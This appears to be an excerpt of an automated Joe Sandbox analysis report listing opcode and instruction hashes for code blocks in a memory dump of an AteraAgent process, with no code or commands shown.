                                                                                                                                                                                                                                                                            • Instruction ID: c720cc11b6496e6a20b6d8c752c0ba466a0fe5137dba9f328a69f6e2018b2bca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec2a30eee26e9b806bb8e21659e3cfc76865a025d8c0c7a14c1fd5aa2ae5dec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C90181B1919BCE8FEB45EF68C8645F97FF0FF56200B4404ABD458C71A2DA745914C741
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7b65d77c78a0c4ad0ebe94435760a4a2f26c3296933aeeacfdc3e62654a44aaa
                                                                                                                                                                                                                                                                            • Instruction ID: fa9342646f6c04b9d57dfc99862f3be61d25a16b12f484bfbc4387ae40d40abe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b65d77c78a0c4ad0ebe94435760a4a2f26c3296933aeeacfdc3e62654a44aaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F0843120AA8C8FD784922CE800B22BBE5EBD7354F1401BAF80CD73A0C8269805C3C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 970bb19dabd4e50f734a6cf1c644cfa3f2fb7ec52447901dbc2afdfd9cb94ffe
                                                                                                                                                                                                                                                                            • Instruction ID: f9d4a3bee2ad204913cd6e5325e45688fd5a8f2ba91870451938166d89ed2520
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 970bb19dabd4e50f734a6cf1c644cfa3f2fb7ec52447901dbc2afdfd9cb94ffe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0FF2050EACA4FE31A977C84545A0BFE1EF46350B4C41F6D48CCB2A3DA18A989C392
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f878dcf3b4203d03dce94d668943cfc1cace420e14d54046002fc5f1e3afe5e3
                                                                                                                                                                                                                                                                            • Instruction ID: cb49025b6e6c9cbf98be3415815f808120361a8fcde423453b1ac9b18a432fae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f878dcf3b4203d03dce94d668943cfc1cace420e14d54046002fc5f1e3afe5e3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80F0A76272DA1C8FA558BB4C24031F873C2EB8B960B10846FD09FC3157DD25680F43C6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 587b7326d0229ecab6b1bbea03793edcd5cac3d11116067fdff0c8b131df64d3
                                                                                                                                                                                                                                                                            • Instruction ID: b2d41d8292956e6bc07e2bfca9e0cc1c3668bbc91058f28b22f23436648a318f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 587b7326d0229ecab6b1bbea03793edcd5cac3d11116067fdff0c8b131df64d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901F93080A68DCFDB44EF24D8613E97BA1FF56300F414879E40CC7292DA79E854C780
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5dda0845c42fcecae68911ffe37fd554084e10923fb2dca3279af659d6a6cebf
                                                                                                                                                                                                                                                                            • Instruction ID: 989e8e12827799457ddf09c9087667edec18ef9aa00de4d8042ece4d9e53db0a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dda0845c42fcecae68911ffe37fd554084e10923fb2dca3279af659d6a6cebf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0FE7192CB088B9F486F0CBC434B977E0FB89B60F10515FF94943251D621B8958AC7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: acae2007894ba82901d848d706f5f26b31a4dac2d782ec88a3104cf313f09497
                                                                                                                                                                                                                                                                            • Instruction ID: 63963afcb26e8b0e5e5166cc85577085709ce2de8b7fb1e7ba52bf9e45cff227
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acae2007894ba82901d848d706f5f26b31a4dac2d782ec88a3104cf313f09497
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F01D71E05A2E8FDBA4EE58D851AA9B371EB4A250F0041B6D00DD3251CE3599458B81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 63b5b56b04b310e635da3f2fdccb691cb878208d1327ab05d02bb3ab9597e772
                                                                                                                                                                                                                                                                            • Instruction ID: a3323938f81061597ec12b3d59e5d18d8c6f8cd084226e7e6d84e3b93029556d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63b5b56b04b310e635da3f2fdccb691cb878208d1327ab05d02bb3ab9597e772
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0E23181AA4B8FD359DB2884456A477E0FF19350B4941AAD44CCB2A3EA29ECD9C7C0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dbbf94b3661f057f40ee564c563fa0ae49d3d05fee3b4452cf461a02287d7e39
                                                                                                                                                                                                                                                                            • Instruction ID: 2f582e5354160178cf3a8bd1133684ae362b3b3717ebcce80990cefd8ee161d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbbf94b3661f057f40ee564c563fa0ae49d3d05fee3b4452cf461a02287d7e39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0E06D72A2CB048B9B085E0CA8030FD77D0EB89630F00022FE54A93651DA22B45246CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6c61d725d45ca2b80783866b04e28ddbb4e78fb3dd7a0a8b6482a0b20356b68a
                                                                                                                                                                                                                                                                            • Instruction ID: c6ba111aec48ba38b850495f679b4f85cff3bb52061ab119b51486d0b0767693
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c61d725d45ca2b80783866b04e28ddbb4e78fb3dd7a0a8b6482a0b20356b68a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F0B43630E9898FDB94CA48E4D4B657BE2FBA5310F4945A8C08CC7266C535DC49C7C0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6afd782cbd52a7ce3578bd42d233a6fc5b7e5a745768c829ec5f1027bd65e0b7
                                                                                                                                                                                                                                                                            • Instruction ID: 586abfab0cf26498c8c5dccce485444adfb338cc1522b1bc11a09d5e8eb419a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6afd782cbd52a7ce3578bd42d233a6fc5b7e5a745768c829ec5f1027bd65e0b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0ED3270C90D8F9F88EE18D451DDA73A1FBA93257105156D00AC7155DA31E852CBC0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f2de9cb56f1f69ac2db2a8d6f9ad7a02099fc71715ad7e004b8338a68bb462a6
                                                                                                                                                                                                                                                                            • Instruction ID: aa153a88ecfcc2a2b73131a1c3806de637b9ea5b653dd1b151aad8599eecdae9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2de9cb56f1f69ac2db2a8d6f9ad7a02099fc71715ad7e004b8338a68bb462a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E04F37B0DA488FABA8C99C784A1FEB7D2E79A125B14437FD14ED3659CD21881683C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: bdeed1d777db7671129002250bc05029fe5e9ecec08ff668100f168fc323d4d2
                                                                                                                                                                                                                                                                            • Instruction ID: 3f260f7c33361e9a053446a6f03938dd08458ce493623e7fc8ef4d00aa036a1c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdeed1d777db7671129002250bc05029fe5e9ecec08ff668100f168fc323d4d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3F054A5E25609DBE744F798C8959ACB7F2FFC8741F454074E04DD3292DE296C018751
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 39594460f6994421d5c93b40d32aa262d513ad368ccf8fc23ef4248bca702ce2
                                                                                                                                                                                                                                                                            • Instruction ID: 8b764e83c656cdcfba25e191dd9d37fb9a0cd6b14f8c1819b863531f506ebb30
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39594460f6994421d5c93b40d32aa262d513ad368ccf8fc23ef4248bca702ce2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E02B77A053846BC7457B69F4105EEBBB0EB82351F6004FBC14CCB402CE2014558BA2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 92cc2b34672fa9da27359e459d2706d91721f9c339b8b59af3f75b580b11f811
                                                                                                                                                                                                                                                                            • Instruction ID: 9e73492d31a806affc7e4be65235a231f53ccd8eb5ffdbcb1647eac37ad5d4d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92cc2b34672fa9da27359e459d2706d91721f9c339b8b59af3f75b580b11f811
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE048D180FBD15FE7565774886A8A0BFD49F1B250B0C84F6D14CCB0B3D549A4099353
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d8fdb431e4e4b11029aa1e0fc9546785d5f47d7535827865fdc0d7056269cc3e
                                                                                                                                                                                                                                                                            • Instruction ID: 1ff3d3f78c74783fcd2dec3f05ee394caab5aacea21dde7b3867b112b7c5ee53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8fdb431e4e4b11029aa1e0fc9546785d5f47d7535827865fdc0d7056269cc3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38E048327095058BE718EB5494906F47352EB96350F14863AE41EC72E5DD69A58583C0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df9bc3cb8e150985f842d8a4a360c8ace00ddb12a3dd9cadfe9064dafca4874e
                                                                                                                                                                                                                                                                            • Instruction ID: 8b2bf8fcdf95d7cc8576adb29b0be45dfeec4d34e053cb74d243c95399c0c145
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df9bc3cb8e150985f842d8a4a360c8ace00ddb12a3dd9cadfe9064dafca4874e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E046303089188FD6A0DF1CE484BA873E1FF48351B5140AAE08ECB275CA28DCC19B80
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 051f7b3c1e4a15ee8c96975463332f144911ceaff54d9cb047ff49644b5bf42b
                                                                                                                                                                                                                                                                            • Instruction ID: 0e98b9deea667e1e27dca8ceb112d97095b05ef05c1409d50344a94171fcf8e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051f7b3c1e4a15ee8c96975463332f144911ceaff54d9cb047ff49644b5bf42b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E0EE72E0491D8ECBA4EB68E851BEDB7B1FF88201F4000BAE00DE3242CE356981CB40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 05f8b455b061c4dd3e7f4b7f34450142ab708ca9ad913f108b5b31eaf0c68ed7
                                                                                                                                                                                                                                                                            • Instruction ID: b43c86081a7b2627d5074566a309b2e8485a485752f01adc57bcf1a285a15955
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05f8b455b061c4dd3e7f4b7f34450142ab708ca9ad913f108b5b31eaf0c68ed7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE0122051BA898FDB8AF77D49419543BE09F5B284FD801E2D88CDF663E04D999EC363
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2a1d78781bc2b81337fe96ea3578d606e77dd13f507756a1e036aa31c6be8879
                                                                                                                                                                                                                                                                            • Instruction ID: e30ae5e1f39dac2cde83d28f5207c13cd3419b0c1c88ee5769bd52654bce5a51
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1d78781bc2b81337fe96ea3578d606e77dd13f507756a1e036aa31c6be8879
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADD05E3221980A8FAA94E35CB4555B4B3D1EBD5271B1601A2D01CC3261DE15DC828784
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7ccac12e33d994c108f6128a3a212f12876e719a6e14e4391f9987162fedc3be
                                                                                                                                                                                                                                                                            • Instruction ID: e1dfc3a1d1cdab9b3c82102d33cc7565515f53dba8cafa58243c4142953a739a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ccac12e33d994c108f6128a3a212f12876e719a6e14e4391f9987162fedc3be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD05E20B0D8258FE9A0EB5CB45477823C0FF49351F0044B6E05DC72A2CA0E988956C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c6b1c48d6d1c9751b13ad495632a42159f2cead738601eac9073fb06bdf04d2a
                                                                                                                                                                                                                                                                            • Instruction ID: 092b4b7f0f70550037bf9355416bd7b5efd635074aba22031637d56fc36a9cf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b1c48d6d1c9751b13ad495632a42159f2cead738601eac9073fb06bdf04d2a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70D05E301092418FCB58AE28E080C80B790EF1220435509E8E0048B2E3C52ADC82CB01
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ba567446957e2dfc6646eebd8f9cbaa57b12e50174f2fef4cdfed6d8073d7ae1
                                                                                                                                                                                                                                                                            • Instruction ID: 2ba84ef7b1aa3fa103a371b95b1f7de0944e77ee65b8eae304d0820d80cb4733
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba567446957e2dfc6646eebd8f9cbaa57b12e50174f2fef4cdfed6d8073d7ae1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24C08CA0926E098BC718B738C841414B6E0FF09200FC005E4E00CC2240D66C90445746
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd